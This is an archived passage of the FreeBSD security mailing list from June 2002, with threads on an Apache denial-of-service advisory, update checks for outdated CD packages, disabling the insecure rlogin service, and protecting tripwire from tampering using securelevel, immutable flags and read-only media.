<3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:34 AM 6/18/2002, Jacques A. 
Vidrine wrote: >FreeBSD is a possible target to denial-of-service attacks. It does >exist in apache 2 also (it was discovered there first). I'm already seeing http processes exiting with signal 8 in my logs. This may mean that people are testing exploits or DoS tools. --Brett From owner-freebsd-security Tue Jun 18 9: 4:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mr01.conversent.com (mr01.conversent.net [216.41.101.18]) by hub.freebsd.org (Postfix) with ESMTP id C6C1F37B409; Tue, 18 Jun 2002 09:04:48 -0700 (PDT) Received: from M5 (warwick.conversent.com [155.212.1.79]) by mr01.conversent.com (8.12.1/8.12.1) with SMTP id g5IG36mI028930; Tue, 18 Jun 2002 12:03:06 -0400 (EDT) From: "Christopher Meiklejohn" To: "Brett Glass" , "Jacques A. Vidrine" , "ANdrei" Cc: Subject: RE: Apache issues Date: Tue, 18 Jun 2002 12:03:07 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <4.3.2.7.2.20020618094648.0321cf00@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I noticed that also. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Brett Glass Sent: Tuesday, June 18, 2002 11:49 AM To: Jacques A. Vidrine; ANdrei Cc: security@FreeBSD.ORG Subject: Re: Apache issues At 09:34 AM 6/18/2002, Jacques A. Vidrine wrote: >FreeBSD is a possible target to denial-of-service attacks. It does >exist in apache 2 also (it was discovered there first). 
I'm already seeing http processes exiting with signal 8 in my logs. This may mean that people are testing exploits or DoS tools. --Brett From owner-freebsd-security Tue Jun 18 9: 9:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 7458B37B407 for ; Tue, 18 Jun 2002 09:09:53 -0700 (PDT) Received: (qmail 52043 invoked by uid 1001); 18 Jun 2002 16:09:52 -0000 Date: Tue, 18 Jun 2002 12:09:52 -0400 From: "Peter C. Lai" To: Christopher Meiklejohn Cc: Brett Glass , "Jacques A. Vidrine" , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618120952.B51798@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <4.3.2.7.2.20020618094648.0321cf00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from cmeiklejohn@conversent.com on Tue, Jun 18, 2002 at 12:03:07PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I trust there will be a security notice/advisory on the apache bug? I've been quite busy lately and seeing the email about the initial report on CERT sent a chill up my spine because I hadn't seen anything about it at all until you guys posted it. -- Peter C. Lai University of Connecticut Dept. 
of Molecular and Cell Biology | Undergraduate Research Assistant Yale Medical School Center for Medical Informatics | Summer Research Assistant http://cowbert.2y.net/ From owner-freebsd-security Tue Jun 18 9:16: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id D7F1A37B406 for ; Tue, 18 Jun 2002 09:15:55 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 45F8A45; Tue, 18 Jun 2002 11:15:55 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5IGFtJI009606; Tue, 18 Jun 2002 11:15:55 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5IGFr2c009605; Tue, 18 Jun 2002 11:15:53 -0500 (CDT) Date: Tue, 18 Jun 2002 11:15:53 -0500 From: "Jacques A. Vidrine" To: peter.lai@uconn.edu Cc: Christopher Meiklejohn , Brett Glass , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618161553.GA9593@madman.nectar.cc> References: <4.3.2.7.2.20020618094648.0321cf00@localhost> <20020618120952.B51798@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020618120952.B51798@cowbert.2y.net> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 12:09:52PM -0400, Peter C. Lai wrote: > I trust there will be a security notice/advisory on the apache > bug? There is one already at . -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . 
Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se From owner-freebsd-security Tue Jun 18 9:22:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 0885037B404 for ; Tue, 18 Jun 2002 09:22:20 -0700 (PDT) Received: (qmail 52112 invoked by uid 1001); 18 Jun 2002 16:22:19 -0000 Date: Tue, 18 Jun 2002 12:22:19 -0400 From: "Peter C. Lai" To: "Jacques A. Vidrine" Cc: peter.lai@uconn.edu, Christopher Meiklejohn , Brett Glass , ANdrei , security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618122219.A52107@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <4.3.2.7.2.20020618094648.0321cf00@localhost> <20020618120952.B51798@cowbert.2y.net> <20020618161553.GA9593@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020618161553.GA9593@madman.nectar.cc>; from nectar@FreeBSD.ORG on Tue, Jun 18, 2002 at 11:15:53AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 11:15:53AM -0500, Jacques A. Vidrine wrote: > On Tue, Jun 18, 2002 at 12:09:52PM -0400, Peter C. Lai wrote: > > I trust there will be a security notice/advisory on the apache > > bug? > > There is one already at > . I meant for here... > > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se -- Peter C. Lai University of Connecticut Dept. 
of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ From owner-freebsd-security Tue Jun 18 9:32:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 9A2B137B406 for ; Tue, 18 Jun 2002 09:32:44 -0700 (PDT) Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 18 Jun 2002 17:32:43 +0100 (BST) To: freebsd-security@freebsd.org Subject: Re: CDs with patched Apache? Reply-To: freebsd-chat@freebsd.org X-It's: all good X-Wigglefluff: fuddtastic X-Zippy: Don't SANFORIZE me!! In-reply-to: Your message of "Tue, 18 Jun 2002 09:45:52 MDT." <4.3.2.7.2.20020618094300.03202e50@localhost> Date: Tue, 18 Jun 2002 17:32:43 +0100 From: Niall Brady Message-ID: <200206181732.aa33043@salmon.maths.tcd.ie> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 09:45:52 MDT, Brett Glass said: > >And even a professional admin can sometimes miss a notice. They're Brett, this thread is completely inappropriate to -security in its current track; please move it to -chat if you must insist on continuing it. 
[same to others; no offence meant ;-)] -- Niall From owner-freebsd-security Tue Jun 18 9:57:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [208.8.184.14]) by hub.freebsd.org (Postfix) with ESMTP id 294D437B406 for ; Tue, 18 Jun 2002 09:57:47 -0700 (PDT) Received: by blort.org (Postfix, from userid 1001) id 2B56D21051; Tue, 18 Jun 2002 09:57:37 -0700 (PDT) Date: Tue, 18 Jun 2002 09:57:36 -0700 From: Kameron Gasso To: Brett Glass Cc: Eric Anderson , Sheldon Hearn , security@freebsd.org Subject: Re: CDs with patched Apache? Message-ID: <20020618095736.A89330@blort.org> Reply-To: kgasso@blort.org References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <4.3.2.7.2.20020618094300.03202e50@localhost> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ibTvN161/egqYuK8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20020618094300.03202e50@localhost>; from brett@lariat.org on Tue, Jun 18, 2002 at 09:45:52AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --ibTvN161/egqYuK8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable * At 08:47PDT on 06/18/2002, Brett Glass wrote: > At 07:05 AM 6/18/2002, Eric Anderson wrote: > > >Maybe FreeBSD needs a "security update check" tool built into sysinstall, that > >will do something like: > > > >If system is being installed from the net, or installing packages from the net, > >automatically grab the update list, and show user possible security risks - > >possibly asking the user if they would like to upgrade their package/system > >right then. 
> > Excellent idea! I agree that this would be useful, especially to users new to FreeBSD - it not only gives them a chance to update any packages prior to installing, but might also give them warm fuzzies knowing that their newfound OS was "neat" enough to check for updates. Either that, or it'll spark their hidden paranoia... ;) Seriously though, a project like this would require someone with both enough knowledge and enough free time to head it up. I know that with a full-time job and attempting to spend time with friends and family, I'm not left with much time available for things of this sort - and I'm sure other people who would love to pursue a project of this sort are in the same boat as well. If this is really something that the FreeBSD community is willing to go forward with, a team should be formed to decide how to best tackle this undertaking. Since we're starting to get a little offtopic here, I'll stop spamming -security with this thread. If anyone wishes to discuss this with me any further, I'd be happy to communicate off-list. Cheers, -- Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt (PS: Brett, yes, the idea for the domain was originally ripped from Don Martin's work for MAD. Good call... 
-k) --ibTvN161/egqYuK8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9D2aARa4UJDpmZqQRAlHfAJ9GGdBCMPGs2iG3/LeZAgxm17BH4ACfc/7i gyotyncJxVyEj3SqZ9nBYsw= =Kl8c -----END PGP SIGNATURE----- --ibTvN161/egqYuK8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 10:36:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id A6F8437B405; Tue, 18 Jun 2002 10:36:08 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5IHZw101024; Tue, 18 Jun 2002 12:35:58 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IHZw315121; Tue, 18 Jun 2002 12:35:58 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IHZs615114; Tue, 18 Jun 2002 12:35:54 -0500 (CDT) Message-ID: <3D0F6F7A.936C1C0E@centtech.com> Date: Tue, 18 Jun 2002 12:35:54 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: kgasso@blort.org Cc: Brett Glass , Sheldon Hearn , security@freebsd.org, freebsd-chat@freebsd.org Subject: Re: CDs with patched Apache? 
MOVING TO -CHAT References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <4.3.2.7.2.20020618094300.03202e50@localhost> <20020618095736.A89330@blort.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kameron Gasso wrote: > Seriously though, a project like this would require someone with both enough knowledge and enough free time to head it up. I know that with a full-time job and attempting to spend time with friends and family, I'm not left with much time available for things of this sort - and I'm sure other people who would love to pursue a project of this sort are in the same boat as well. > > If this is really something that the FreeBSD community is willing to go forward with, a team should be formed to decide how to best tackle this undertaking. > > Since we're starting to get a little offtopic here, I'll stop spamming -security with this thread. If anyone wishes to discuss this with me any further, I'd be happy to communicate off-list. > Well, since I threw the idea out there, I am more than willing to lead it, and of course work on it. Either way, I'm working on it. Anyone else? Eric [thread moved to -chat!] -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. 
------------------------------------------------------------------

From: Alex Michlin
To: freebsd-security@freebsd.org
Date: Tue, 18 Jun 2002 15:22:53 -0400 (EDT)
Subject: Disable Login

I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the server to upgrade the OS (make world...). As a temporary fix, can I chmod 000 logon or possibly even remove it completely? Should everything function correctly? (OpenSSH mainly)?

TIA,

Alex

From: Eric F Crist
To: Alex Michlin, freebsd-security@freebsd.org
Date: Tue, 18 Jun 2002 14:43:14 -0500
Subject: RE: Disable Login
Message-ID: <001c01c21700$664e94e0$77fe180c@armageddon>

What kind of a bug in login are you seeing? If you completely disable the login utility, you would not be able to logon locally, which could make an upgrade difficult. If you simply want to disable logon for specific users, simply set their shell to /etc/nologin or some other non-existent file/shell.

HTH

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: Alex Michlin
Sent: Tuesday, June 18, 2002 2:23 PM
To: freebsd-security@FreeBSD.ORG
Subject: Disable Login

I have a FreeBSD 4.2 server with a bug in login. I cannot reboot the server to upgrade the OS (make world...). As a temporary fix, can I chmod 000 logon or possibly even remove it completely? Should everything function correctly? (OpenSSH mainly)?

TIA,

Alex

From: Alex Michlin
To: Eric F Crist
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 18 Jun 2002 16:08:56 -0400 (EDT)
Subject: RE: Disable Login
In-Reply-To: <001c01c21700$664e94e0$77fe180c@armageddon>

I remember seeing a FreeBSD advisory on a bug in login. Now, for the real story... What is behind this is: I just downloaded the latest Saint version and ran it against a server. It said there login was vulnerable. I'm not sure how it knows if there is a bug or just information (but it is listed under the critical section).

Thanks again,

Alex

On Tue, 18 Jun 2002, Eric F Crist wrote:

> What kind of a bug in login are you seeing? If you completely disable
> the login utility, you would not be able to logon locally, which could
> make an upgrade difficult. If you simply want to disable logon for
> specific users, simply set their shell to /etc/nologin or some other
> non-existent file/shell.
>
> HTH
>
> Eric F Crist

From: Darren Pilgrim
To: Alex Michlin
Cc: Eric F Crist, freebsd-security@FreeBSD.ORG
Date: Tue, 18 Jun 2002 13:43:39 -0700
Subject: Re: Disable Login
Message-ID: <3D0F9B7B.93FEBB49@pantherdragon.org>

Alex Michlin wrote:
>
> I remember seeing a FreeBSD advisory on a bug in login. Now, for the
> real story... What is behind this is: I just downloaded the latest Saint
> version and ran it against a server. It said there login was vulnerable.
> I'm not sure how it knows if there is a bug or just information (but it is
> listed under the critical section).

What was the login method? Telnet? SSH? rsh? I just looked at the entire list of FreeBSD advisories going back to 1996 and there aren't any for login (login is a specific program). What was the advisory number? There have been FreeBSD advisories on both telnet and ssh, perhaps that's what you saw?

From: Fernando Gleiser
To: Alex Michlin
Date: Tue, 18 Jun 2002 18:08:53 -0300 (ART)
Subject: RE: Disable Login
Message-ID: <20020618175353.F68133-100000@localhost>

On Tue, 18 Jun 2002, Alex Michlin wrote:

> I remember seeing a FreeBSD advisory on a bug in login. Now, for the
> real story... What is behind this is: I just downloaded the latest Saint
> version and ran it against a server. It said there login was vulnerable.
> I'm not sure how it knows if there is a bug or just information (but it is
> listed under the critical section).

saint checks whether the login *service* (512/tcp, a.k.a. rlogin) is running, it doesn't check for vulnerabilities in the login *program* (/usr/bin/login)

rlogin is insecure because it sends everything in cleartext and may be vulnerable to ip spoofing if you use .rhosts for authentication. Just comment it out in inetd.conf and use ssh instead.

Fer
From: Maxlor
To: freebsd-security@freebsd.org
Date: Wed, 19 Jun 2002 01:27:51 +0200
Subject: preventing tampering with tripwire
Message-ID: <27700541.1024450071@[10.0.0.16]>

After being rooted recently (no idea how it happened - I was following the SAs and whatnot... and yes, I already formatted and reinstalled), I decided to install tripwire, so I would be alerted to something like that sooner.

The thing installed fine and is running ok, there's just this one thing that's puzzling me:

How do I prevent an intruder that somehow gains root on my machine from simply replacing the tripwire binary that always gives me an "everything ok" report?

I've been considering putting the binary on a floppy or CD, but then an intruder could simply unmount the disk and place the replacement binaries in the mountpoint dir.

I'm currently running tripwire as a nightly cronjob, and I'd rather not resort to mounting a disk, running tripwire from it manually, then unmounting it. You know, my laziness and the effort needed to do this would lead to me eventually no longer doing it...

So, how did you solve this problem?

Greetings
Maxlor

From: Baldur Gislason
To: Maxlor
Cc: freebsd-security@freebsd.org
Date: Tue, 18 Jun 2002 23:40:20 +0000
Subject: Re: preventing tampering with tripwire
Message-Id: <20020618234139.D1F422744@tesla.foo.is>

use kern.securelevel 1 or higher and man chflags, set the tripwire binary schg so it cannot be tampered with. Of course there's no such thing as absolute security, but this moves you just a step closer. Unless the intruder performs a reboot and makes his changes before the kernel securelevel is raised on boot.

Baldur

On Tuesday 18 June 2002 23:27, you wrote:
> After being rooted recently (no idea how it happened - I was following the
> SAs and whatnot... and yes, I already formatted and reinstalled), I decided
> to install tripwire, so I would be alerted to something like that sooner.
>
> The thing installed fine and is running ok, there's just this one thing
> that's puzzling me:
>
> How do I prevent an intruder that somehow gains root on my machine from
> simply replacing the tripwire binary that always gives me an "everything
> ok" report?
>
> I've been considering putting the binary on a floppy or CD, but then an
> intruder could simply unmount the disk and place the replacement binaries
> in the mountpoint dir.
>
> I'm currently running tripwire as a nightly cronjob, and I'd rather not
> resort to mounting a disk, running tripwire from it manually, then
> unmounting it. You know, my laziness and the effort needed to do this would
> lead to me eventually no longer doing it...
>
> So, how did you solve this problem?
>
> Greetings
> Maxlor

From: Klaus Steden
To: Maxlor
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 18 Jun 2002 19:49:59 -0400
Subject: Re: preventing tampering with tripwire
Message-ID: <20020618194958.K99167@cthulu.compt.com>

Read-only media is a good thing, too.

It may be overkill (in the case of security, is there such a thing, though?), but you could re-purpose an old disk drive, add security tools you want to it, and jumper it read-only. That wouldn't necessarily prevent your database from being compromised, but your tools would be intact.

With a read-only disk, I would ...

- install the security tools you want on it
- generate any baseline configuration data and signatures
- make the disk physically read-only
- run your nightly cron jobs, comparing your daily results against your read-only baseline.

Of course, every time you upgrade something, you'll have to unjumper the disk, update your signatures, and rejumper it, but that's not really such a big deal when compared with what else you might have to do. :>

Keeping known good copies of essential programs (ls, find, dd, netstat, route, ifconfig, mv, cp, df, etc.) on the read-only media is a good idea, too.

You could accomplish this with CDROMs if you don't want to use a disk drive, but you lose the option of rewritability.

hope this helps,
Klaus

From: Maxlor
To: Baldur Gislason
Cc: freebsd-security@freebsd.org
Date: Wed, 19 Jun 2002 02:12:33 +0200
Subject: Re: preventing tampering with tripwire
Message-ID: <30381786.1024452753@[10.0.0.16]>
In-Reply-To: <20020618234139.D1F422744@tesla.foo.is>

As I read that, I thought "Doh". That's really pretty much the ideal solution... And if an attacker has physical access to my machine, well, he can do pretty much anything he wants anyway.

Thanks!

--On Tuesday, 18 June 2002 23:40 +0000 Baldur Gislason wrote:

> use kern.securelevel 1 or higher and man chflags, set the tripwire binary
> schg so it cannot be tampered with. Of course there's no such thing as
> absolute security, but this moves you just a step closer. Unless the
> intruder performs a reboot and makes his changes before the kernel
> securelevel is raised on boot.
>
> Baldur

From: twig les
To: Klaus Steden, Maxlor
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 18 Jun 2002 17:15:52 -0700 (PDT)
Subject: Re: preventing tampering with tripwire
Message-ID: <20020619001552.79019.qmail@web10108.mail.yahoo.com>
In-Reply-To: <20020618194958.K99167@cthulu.compt.com>

You can also write a script to grab the signature of the tripwire binary itself from a remote server. A co-worker of mine is doing something like this right now and I'll ask him about it, but my gut says it'll be hush-hush secret.

Don't forget to direct syslog output to a line printer BTW. ;)

--- Klaus Steden wrote:
> Read-only media is a good thing, too.
>
> It may be overkill (in the case of security, is there such a thing, though?),
> but you could re-purpose an old disk drive, add security tools you want to it,
> and jumper it read-only. That wouldn't necessarily prevent your database from
> being compromised, but your tools would be intact.
>
> With a read-only disk, I would ...
>
> - install the security tools you want on it
> - generate any baseline configuration data and signatures
> - make the disk physically read-only
> - run your nightly cron jobs, comparing your daily results against your
> read-only baseline.
>
> Of course, every time you upgrade something, you'll have to unjumper the disk,
> update your signatures, and rejumper it, but that's not really such a big
> deal when compared with what else you might have to do. :>
>
> Keeping known good copies of essential programs (ls, find, dd, netstat, route,
> ifconfig, mv, cp, df, etc.) on the read-only media is a good idea, too.
>
> You could accomplish this with CDROMs if you don't want to use a disk drive,
> but you lose the option of rewritability.
>
> hope this helps,
> Klaus

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------
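One way to put the thread's advice into practice, as an added example that is not code from any of the posters: a POSIX sh script that checks the tripwire binary and a few essential tools against a reference manifest kept off the box (twig les's remote-signature idea, or Klaus's read-only media), and on FreeBSD reports the kern.securelevel and schg flag that Baldur describes. The manifest format, the /usr/local/sbin/tripwire path and the sample files in the demo are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: check tripwire and a few essential tools
# against a reference manifest stored off the box, and on FreeBSD report the
# protections Baldur describes (kern.securelevel and the schg flag).
# Assumptions: the manifest is fetched out of band (from a trusted host or
# read-only media) and has lines of the form "<sha256>  <absolute path>";
# /usr/local/sbin/tripwire is assumed to be where the port puts the binary.

# Portable SHA-256 of one file: FreeBSD has sha256(1), Linux has sha256sum(1).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        sha256 -q "$1"
    fi
}

# verify_manifest MANIFEST
# Prints OK / MISMATCH / MISSING per entry and returns the number of entries
# that are not OK, so 0 means every listed binary still matches its reference.
verify_manifest() {
    bad=0
    while read -r expected path; do
        case $expected in ''|'#'*) continue ;; esac   # skip blanks and comments
        if [ ! -f "$path" ]; then
            echo "MISSING  $path"
            bad=$((bad + 1))
        elif [ "$(hash_file "$path")" = "$expected" ]; then
            echo "OK       $path"
        else
            echo "MISMATCH $path"
            bad=$((bad + 1))
        fi
    done < "$1"
    return "$bad"
}

# report_freebsd_protections PATH
# With kern.securelevel >= 1 even root cannot clear the schg flag without a
# reboot, which is the point of Baldur's advice; elsewhere the check is skipped.
report_freebsd_protections() {
    if [ "$(uname -s)" != FreeBSD ]; then
        echo "not FreeBSD: securelevel/schg check skipped"
        return 0
    fi
    echo "kern.securelevel = $(sysctl -n kern.securelevel)"
    # ls -lo prints the file flags in the fifth column
    if ls -lo "$1" | awk '{ print $5 }' | grep -q schg; then
        echo "schg set on $1"
    else
        echo "WARNING: $1 is not schg (consider: chflags schg $1)"
    fi
}

# demo_tamper_detection
# Builds a throwaway directory with two constructed "binaries", records their
# hashes, then replaces one the way a root intruder would swap tripwire for a
# copy that always reports "everything ok"; echoes the number of failed entries.
demo_tamper_detection() {
    tmp=$(mktemp -d)
    printf 'tripwire placeholder\n' > "$tmp/tripwire"
    printf 'ls placeholder\n' > "$tmp/ls"
    {
        echo "# reference manifest, normally fetched from a trusted host"
        echo "$(hash_file "$tmp/tripwire")  $tmp/tripwire"
        echo "$(hash_file "$tmp/ls")  $tmp/ls"
    } > "$tmp/manifest"
    printf 'replaced tripwire\n' > "$tmp/tripwire"
    if verify_manifest "$tmp/manifest" >/dev/null; then bad=0; else bad=$?; fi
    rm -rf "$tmp"
    echo "$bad"   # 1: the replaced tripwire is caught, ls still matches
}

if [ "${1:-}" = demo ]; then
    demo_tamper_detection
    report_freebsd_protections /usr/local/sbin/tripwire
fi
```

Run it from cron with the manifest on media the box cannot rewrite, and treat any MISMATCH or MISSING line as an incident rather than trusting the report of the tripwire binary itself.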
- Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 18:27:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 201DE37B406 for ; Tue, 18 Jun 2002 18:27:33 -0700 (PDT) Received: from user-2inivba.dialup.mindspring.com ([165.121.125.106] helo=earthlink.net) by pintail.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17KUFv-0001DL-00 for security@FreeBSD.ORG; Tue, 18 Jun 2002 18:27:32 -0700 Message-ID: <3D0FDE0D.2040100@earthlink.net> Date: Tue, 18 Jun 2002 18:27:41 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: CDs with patched Apache? References: <200206180539.XAA26264@lariat.org> <200206180539.XAA26264@lariat.org> <4.3.2.7.2.20020618033604.00d42aa0@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > At 12:31 AM 6/18/2002, Kameron Gasso wrote: > > >>Wasn't the fact that -RELEASE branches don't get updated with new packages already discussed extensively in the not-so-distant past? > > > Some folks yelled at me for pointing it out, but alas there was no > real discussion of how to solve the problem. > > >>Although it wouldn't be very glamorous (and I certainly wouldn't reccommend it), the port installed with the latest -RELEASE could be "broken" so it wouldn't download and install without someone forcing it. 
Still, this wouldn't really encourage them to upgrade their ports tree - it'd more than likely just cause much swearing and force people to work around the problem. > > > It'd still be a warning. Hmmm.... Maybe the warning could be made part > of pkg_add, and/or something that pkg_add executed. It would simply say, > "proceed at your own risk!" > > But if you were installing from CD, you wouldn't be warned. Unless.... > Unless pkg_add phoned home to check on the package. Which is possible > if the machine can be connected to the Net. > This is probably not feasible. I for one when installing from CD do not network the machine until I have done a bunch of other things first to secure it. That is why I use CD's beyond it being quicker and more reliable is so I can setup a box in a secure environment (Not networked). Plus the idea of the CD is to not need/require a network connection. Honestly I never use the CD packages since they will be outdated by the time I use it. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 18:33:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from harrier.mail.pas.earthlink.net (harrier.mail.pas.earthlink.net [207.217.120.12]) by hub.freebsd.org (Postfix) with ESMTP id B5A6037B401 for ; Tue, 18 Jun 2002 18:33:45 -0700 (PDT) Received: from user-2inivba.dialup.mindspring.com ([165.121.125.106] helo=earthlink.net) by harrier.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17KULn-0004AK-00; Tue, 18 Jun 2002 18:33:35 -0700 Message-ID: <3D0FDF77.8020703@earthlink.net> Date: Tue, 18 Jun 2002 18:33:43 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Fernando Gleiser Cc: Alex Michlin , freebsd-security@FreeBSD.ORG Subject: Re: Disable Login References: <20020618175353.F68133-100000@localhost> Content-Type: 
